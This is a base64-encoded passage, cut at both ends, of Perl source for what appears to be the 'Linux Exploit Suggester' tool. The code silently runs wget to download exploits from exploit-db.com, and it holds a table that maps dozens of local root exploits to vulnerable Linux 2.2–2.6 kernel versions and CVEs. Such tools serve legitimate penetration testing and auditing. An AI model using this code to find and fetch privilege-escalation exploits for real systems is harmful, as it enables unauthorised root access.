CRzcmVmLCAkYXJlZikgPSBAXzsKICAgIG15IEBzZWxlY3RlZCA9IEB7ICRzcmVmIH07CiAgICBteSBAYXBwbGljYWJsZSA9IEB7ICRhcmVmIH07CiAgICBteSAkZXhwbG9pdF9iYXNlID0gInd3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cyI7CiAgICBteSAkZG93bmxvYWRfYmFzZSA9ICJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9yYXcvIjsKICAgIHByaW50ICJcbiI7CgogICAgZm9yZWFjaCBteSAkbnVtIChAc2VsZWN0ZWQpIHsKICAgICAgICBteSAkbWlsID0gJGFwcGxpY2FibGVbJG51bS0xXXttaWx9OwogICAgICAgIG5leHQgaWYgKCFkZWZpbmVkICRtaWwpOwogICAgICAgIG15ICgkZXhwbG9pdF9udW0pID0gKCRtaWwgPX4gL14uKlwvKFsxLTldWzAtOV0qKVwvPyQvKTsKICAgICAgICAKICAgICAgICBpZiAoJGV4cGxvaXRfbnVtICYmIGluZGV4KCRtaWwsICRleHBsb2l0X2Jhc2UpICE9IC0xKSB7CiAgICAgICAgICAgIG15ICR1cmwgPSAkZG93bmxvYWRfYmFzZSAuICRleHBsb2l0X251bTsKICAgICAgICAgICAgbXkgJGZpbGUgPSAiZXhwbG9pdF8kYXBwbGljYWJsZVskbnVtLTFde2tleX0iOwogICAgICAgICAgICBwcmludCAiICBEb3dubG9hZGluZyBcZVswMDszM20kdXJsXGVbMDBtIC0+IFxlWzAwOzMzbSRmaWxlXGVbMDBtXG4iOwogICAgICAgICAgICBzeXN0ZW0gIndnZXQgJHVybCAtTyAkZmlsZSA+IC9kZXYvbnVsbCAyPiYxIjsKICAgICAgICB9CiAgICAgICAgZWxzZSB7CiAgICAgICAgICAgIHByaW50ICIgIE5vIGV4cGxvaXQgY29kZSBhdmFpbGFibGUgZm9yIFxlWzAwOzMzbSRhcHBsaWNhYmxlWyRudW0tMV17a2V5fVxlWzAwbVxuIjsgCiAgICAgICAgfQogICAgfQogICAgcHJpbnQgIlxuIjsKfQoKc3ViIHVuaXEgewogICAgbXkgJXNlZW47CiAgICBncmVwICEkc2VlbnskX30rKywgQF87Cn0KCnN1YiB1c2FnZSB7CnByaW50X2Jhbm5lcigpOwpwcmludCAiICBcZVswMDszNW1Vc2FnZTpcZVswMG0gJDAgWy1oXSBbLWsga2VybmVsXSBbLWRdXG5cbiI7CnByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0taFxlWzAwbVxlWzAwOzMzbV1cZVswMG0gSGVscCAodGhpcyBtZXNzYWdlKVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1rXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBLZXJuZWwgbnVtYmVyIChlZy4gMi42LjI4KVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1kXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudVxuXG4iOwoKcHJpbnQgIiAgWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KVxuIjsKcHJpbnQgIiAgdG8gc2VlIGFsbCBleHBsb2l0cyBhdmFpbGFibGUuXG5cbiI7Cn0KCnN1YiBwcmludF9iYW5uZXIgewpwcmludCAiXG5cZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG4iOwpwcmludCAiXGVbMTszMW0gICAgTGludXggRXhwbG9pdCBTdWdnZXN0ZXIgJFZFUlNJT05cZVswMG1cbiI7CnByaW50ICJcZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG5cbiI7Cn0KCnN1YiBnZXRfZXhwbG9pdHMgewogIHJldHVybiAoCiAgICAndzAwdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xNicsICcyLjQuMTcnLCAnMi40LjE4JywKICAgICAgICAgICAgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywKICAgICAgICBdCiAgICB9LAogICAgJ2JyaycgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjEwJywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsICcyLjQuMjInIF0sCiAgICB9LAogICAgJ2F2ZScgPT4geyB2dWxuID0+IFsgJzIuNC4xOScsICcyLjQuMjAnIF0gfSwKCiAgICAnZWxmbGJsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNC4yOSddLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNzQ0JywKICAgIH0sCgogICAgJ2VsZmR1bXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40LjI3J10gfSwKICAgICdlbGZjZCcgICAgICAgID0+IHsgdnVsbiA9PiBbJzIuNi4xMiddIH0sCiAgICAnZXhwYW5kX3N0YWNrJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAoKICAgICdoMDBseXNoaXQnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsCiAgICAgICAgICAgICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDA2LTM2MjYnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDEzJywKICAgIH0sCgogICAgJ2tkdW1wJyA9PiB7IHZ1bG4gPT4gWycyLjYuMTMnXSB9LAogICAgJ2ttMicgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4yMicgXSB9LAogICAgJ2tyYWQnID0+CiAgICAgIHsgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdIH0sCgogICAgJ2tyYWQzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL2V4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEzOTcnLAogICAgfSwKCiAgICAnbG9jYWwyNicgPT4geyB2dWxuID0+IFsnMi42LjEzJ10gfSwKICAgICdsb2tvJyAgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnIF0gfSwKCiAgICAnbXJlbWFwX3B0ZScgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjIwJywgJzIuMi4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTYwJywKICAgIH0sCgogICAgJ25ld2xvY2FsJyA9PiB7IHZ1bG4gPT4gWyAnMi40LjE3JywgJzIuNC4xOScgXSB9LAogICAgJ29uZ19iYWsnICA9PiB7IHZ1bG4gPT4gWycyLjYuNSddIH0sCiAgICAncHRyYWNlJyA9PgogICAgICB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywgJzIuNC4yMicgXSB9LAogICAgJ3B0cmFjZV9rbW9kJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLCAnMi40LjIyJyBdLAogICAgICAgIGN2ZSAgPT4gJzIwMDctNDU3MycsCiAgICB9LAogICAgJ3B0cmFjZV9rbW9kMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsICcyLjYuMzEnLAogICAgICAgICAgICAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdpYTMyc3lzY2FsbCxyb2JlcnRfeW91X3N1Y2snLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTAyMycsCiAgICAgICAgY3ZlID0+ICcyMDEwLTMzMDEnLAogICAgfSwKICAgICdwdHJhY2UyNCcgPT4geyB2dWxuID0+IFsnMi40LjknXSB9LAogICAgJ3B3bmVkJyAgICA9PiB7IHZ1bG4gPT4gWycyLjYuMTEnXSB9LAogICAgJ3B5MicgICAgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjE3JywgJzIuNi4xNScsICcyLjYuMTMnIF0gfSwKICAgICdyYXB0b3JfcHJjdGwnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnIF0sCiAgICAgICAgY3ZlICA9PiAnMjAwNi0yNDUxJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMjAzMScsCiAgICB9LAogICAgJ3ByY3RsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA0JywKICAgIH0sCiAgICAncHJjdGwyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA1JywKICAgIH0sCiAgICAncHJjdGwzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA2JywKICAgIH0sCiAgICAncHJjdGw0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDExJywKICAgIH0sCiAgICAncmVtYXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40J10gfSwKICAgICdyaXAnICAgICAgICA9PiB7IHZ1bG4gPT4gWycyLjInXSB9LAogICAgJ3N0YWNrZ3JvdzInID0+IHsgdnVsbiA9PiBbICcyLjQuMjknLCAnMi42LjEwJyBdIH0sCiAgICAndXNlbGliMjQnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMCcsICcyLjQuMTcnLCAnMi40LjIyJywgJzIuNC4yNScsICcyLjQuMjcnLCAnMi40LjI5JyBdCiAgICB9LAogICAgJ25ld3NtcCcgICA9PiB7IHZ1bG4gPT4gWycyLjYnXSB9LAogICAgJ3NtcHJhY2VyJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAogICAgJ2xvZ2lueCcgICA9PiB7IHZ1bG4gPT4gWycyLjQuMjInXSB9LAogICAgJ2V4cC5zaCcgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjEwJywgJzIuNi4xNicsICcyLjYuMTMnIF0gfSwKICAgICd2bXNwbGljZTEnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICAgICAgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI0LjEnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdqZXNzaWNhIGJpZWwnLAogICAgICAgIGN2ZSA9PiAnMjAwOC0wNjAwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MicsCiAgICB9LAogICAgJ3Ztc3BsaWNlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjIzJywgJzIuNi4yNCcgXSwKICAgICAgICBhbHQgID0+ICdkaWFuZV9sYW5lJywKICAgICAgICBjdmUgID0+ICcyMDA4LTA2MDAnLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MycsCiAgICB9LAogICAgJ3Zjb25zb2xlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNiddLAogICAgICAgIGN2ZSAgPT4gJzIwMDktMTA0NicsCiAgICB9LAogICAgJ3NjdHAnID0+IHsKICAgICAgICB2dWxuID0+IFsnMi42LjI2J10sCiAgICAgICAgY3ZlICA9PiAnMjAwOC00MTEzJywKICAgIH0sCiAgICAnZnRyZXgnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAwOC00MjEwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNjg1MScsCiAgICB9LAogICAgJ2V4aXRfbm90aWZ5JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy84MzY5JywKICAgIH0sCiAgICAndWRldicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScgXSwKICAgICAgICBhbHQgID0+ICd1ZGV2IDwxLjQuMScsCiAgICAgICAgY3ZlICA9PiAnMjAwOS0xMTg1JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvODQ3OCcsCiAgICB9LAoKICAgICdzb2NrX3NlbmRwYWdlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjAnLCAgJzIuNi4xJywKICAgICAgICAgICAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywgICcyLjYuNicsICAnMi42LjcnLAogICAgICAgICAgICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsICcyLjYuMTMnLAogICAgICAgICAgICAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywgJzIuNi4xOCcsICcyLjYuMTknLAogICAgICAgICAgICAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywgJzIuNi4yNCcsICcyLjYuMjUnLAogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ3Byb3RvX29wcycsCiAgICAgICAgY3ZlID0+ICcyMDA5LTI2OTInLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy85NDM2JywKICAgIH0sCgogICAgJ3NvY2tfc2VuZHBhZ2UnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNC40JywgICcyLjQuNScsICAnMi40LjYnLCAgJzIuNC43JywgICcyLjQuOCcsICAnMi40LjknLAogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xMScsICcyLjQuMTInLCAnMi40LjEzJywgJzIuNC4xNCcsICcyLjQuMTUnLAogICAgICAgICAgICAnMi40LjE2JywgJzIuNC4xNycsICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLAogICAgICAgICAgICAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnLCAnMi40LjI1JywgJzIuNC4yNicsICcyLjQuMjcnLAogICAgICAgICAgICAnMi40LjI4JywgJzIuNC4yOScsICcyLjQuMzAnLCAnMi40LjMxJywgJzIuNC4zMicsICcyLjQuMzMnLAogICAgICAgICAgICAnMi40LjM0JywgJzIuNC4zNScsICcyLjQuMzYnLCAnMi40LjM3JywgJzIuNi4wJywgICcyLjYuMScsCiAgICAgICAgICAgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsICAnMi42LjYnLCAgJzIuNi43JywKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsICcyLjYuMTInLCAnMi42LjEzJywKICAgICAgICAgICAgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywKICAgICAgICAgICAgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI1JywKICAgICAgICAgICAgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsICcyLjYuMzAnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICd3dW5kZXJiYXJfZW1wb3JpdW0nLAogICAgICAgIGN2ZSA9PiAnMjAwOS0yNjkyJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvOTQzNScsCiAgICB9LAogICAgJ3VkcF9zZW5kbXNnXzMyYml0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLCAgJzIuNi42JywKICAgICAgICAgICAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLCAnMi42LjEyJywKICAgICAgICAgICAgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLCAnMi42LjE4JywKICAgICAgICAgICAgJzIuNi4xOScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMjY5OCcsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL2Rvd25sb2Fkcy5zZWN1cml0eWZvY3VzLmNvbS92dWxuZXJhYmlsaXRpZXMvZXhwbG9pdHMvMzYxMDguYycsCiAgICB9LAogICAgJ3BpcGUuY18zMmJpdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjQnLCAgJzIuNC41JywgICcyLjQuNicsICAnMi40LjcnLCAgJzIuNC44JywgICcyLjQuOScsCiAgICAgICAgICAgICcyLjQuMTAnLCAnMi40LjExJywgJzIuNC4xMicsICcyLjQuMTMnLCAnMi40LjE0JywgJzIuNC4xNScsCiAgICAgICAgICAgICcyLjQuMTYnLCAnMi40LjE3JywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsCiAgICAgICAgICAgICcyLjQuMjInLCAnMi40LjIzJywgJzIuNC4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycsCiAgICAgICAgICAgICcyLjQuMjgnLCAnMi40LjI5JywgJzIuNC4zMCcsICcyLjQuMzEnLCAnMi40LjMyJywgJzIuNC4zMycsCiAgICAgICAgICAgICcyLjQuMzQnLCAnMi40LjM1JywgJzIuNC4zNicsICcyLjQuMzcnLCAnMi42LjE1JywgJzIuNi4xNicsCiAgICAgICAgICAgICcyLjYuMTcnLCAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsCiAgICAgICAgICAgICcyLjYuMjMnLCAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsCiAgICAgICAgICAgICcyLjYuMjknLCAnMi42LjMwJywgJzIuNi4zMScsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMDktMzU0NycsCiAgICAgICAgbWlsID0+CiAgICAgICAgICAnaHR0cDovL3d3dy5zZWN1cml0eWZvY3VzLmNvbS9kYXRhL3Z1bG5lcmFiaWxpdGllcy9leHBsb2l0cy8zNjkwMS0xLmMnLAogICAgfSwKICAgICdkb19wYWdlc19tb3ZlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnc2lldmUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0wNDE1JywKICAgICAgICBtaWwgPT4gJ1NwZW5kZXJzIEVubGlnaHRlbm1lbnQnLAogICAgfSwKICAgICdyZWlzZXJmcycgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsCiAgICAgICAgXSwKICAgICAgICBjdmUgPT4gJzIwMTAtMTE0NicsCiAgICAgICAgbWlsID0+ICdodHRwOi8vd3d3LmV4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEyMTMwJywKICAgIH0sCiAgICAnY2FuX2JjbScgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGN2ZSA9PiAnMjAxMC0yOTU5JywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTQ4MTQnLAogICAgfSwKICAgICdyZHMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsCiAgICAgICAgICAgICcyLjYuMzQnLCAnMi42LjM1JywgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTUyODUnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zOTA0JywKICAgIH0sCiAgICAnaGFsZl9uZWxzb24xJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbCiAgICAgICAgICAgICcyLjYuMCcsICAnMi42LjEnLCAgJzIuNi4yJywgICcyLjYuMycsICAnMi42LjQnLCAgJzIuNi41JywKICAgICAgICAgICAgJzIuNi42JywgICcyLjYuNycsICAnMi42LjgnLCAgJzIuNi45JywgICcyLjYuMTAnLCAnMi42LjExJywKICAgICAgICAgICAgJzIuNi4xMicsICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JywKICAgICAgICAgICAgJzIuNi4xOCcsICcyLjYuMTknLCAnMi42LjIwJywgJzIuNi4yMScsICcyLjYuMjInLCAnMi42LjIzJywKICAgICAgICAgICAgJzIuNi4yNCcsICcyLjYuMjUnLCAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywKICAgICAgICAgICAgJzIuNi4zMCcsICcyLjYuMzEnLCAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLCAnMi42LjM1JywKICAgICAgICAgICAgJzIuNi4zNicsCiAgICAgICAgXSwKICAgICAgICBhbHQgPT4gJ2Vjb25ldCcsCiAgICAgICAgY3ZlID0+ICcyMDEwLTM4NDgnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNzc4NycsCiAgICB9LAogICAgJ2hhbGZfbmVsc29uMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjAnLCAgJzIuNi4xJywgICcyLjYuMicsICAnMi42LjMnLCAgJzIuNi40JywgICcyLjYuNScsCiAgICAgICAgICAgICcyLjYuNicsICAnMi42LjcnLCAgJzIuNi44JywgICcyLjYuOScsICAnMi42LjEwJywgJzIuNi4xMScsCiAgICAgICAgICAgICcyLjYuMTInLCAnMi42LjEzJywgJzIuNi4xNCcsICcyLjYuMTUnLCAnMi42LjE2JywgJzIuNi4xNycsCiAgICAgICAgICAgICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywgJzIuNi4yMycsCiAgICAgICAgICAgICcyLjYuMjQnLCAnMi42LjI1JywgJzIuNi4yNicsICcyLjYuMjcnLCAnMi42LjI4JywgJzIuNi4yOScsCiAgICAgICAgICAgICcyLjYuMzAnLCAnMi42LjMxJywgJzIuNi4zMicsICcyLjYuMzMnLCAnMi42LjM0JywgJzIuNi4zNScsCiAgICAgICAgICAgICcyLjYuMzYnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdlY29uZXQnLAogICAgICAgIGN2ZSA9PiAnMjAxMC0zODUwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTc3ODcnLAogICAgfSwKICAgICdoYWxmX25lbHNvbjMnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4wJywgICcyLjYuMScsICAnMi42LjInLCAgJzIuNi4zJywgICcyLjYuNCcsICAnMi42LjUnLAogICAgICAgICAgICAnMi42LjYnLCAgJzIuNi43JywgICcyLjYuOCcsICAnMi42LjknLCAgJzIuNi4xMCcsICcyLjYuMTEnLAogICAgICAgICAgICAnMi42LjEyJywgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnLAogICAgICAgICAgICAnMi42LjE4JywgJzIuNi4xOScsICcyLjYuMjAnLCAnMi42LjIxJywgJzIuNi4yMicsICcyLjYuMjMnLAogICAgICAgICAgICAnMi42LjI0JywgJzIuNi4yNScsICcyLjYuMjYnLCAnMi42LjI3JywgJzIuNi4yOCcsICcyLjYuMjknLAogICAgICAgICAgICAnMi42LjMwJywgJzIuNi4zMScsICcyLjYuMzInLCAnMi42LjMzJywgJzIuNi4zNCcsICcyLjYuMzUnLAogICAgICAgICAgICAnMi42LjM2JywKICAgICAgICBdLAogICAgICAgIGFsdCA9PiAnZWNvbmV0JywKICAgICAgICBjdmUgPT4gJ